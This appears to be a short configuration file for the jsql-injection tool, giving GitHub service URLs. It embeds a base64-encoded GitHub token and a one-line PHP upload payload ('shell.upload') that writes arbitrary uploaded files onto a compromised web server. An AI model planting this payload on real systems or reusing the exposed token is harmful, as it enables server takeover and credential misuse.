github.webservice.url = https://raw.githubusercontent.com/ron190/jsql-injection/master/web/services/jsql-injection.json
github.webservice.i18n.url = https://raw.githubusercontent.com/ron190/jsql-injection/master/web/services/i18n/jsql.properties
github.issues.url = https://api.github.com/repos/ron190/jsql-injection/issues
github.token = NGQ1YzdkYWE1NDQwYzdkNTk1YTZlODQzYzFlODlkZmMzNzQ1NDhlNg==

shell.upload = <?php echo move_uploaded_file($_FILES['u']['tmp_name'], getcwd().'/'.basename($_FILES['u']['name']))?'SQLiy':'n'; ?>
shell.system = 
shell.sql = 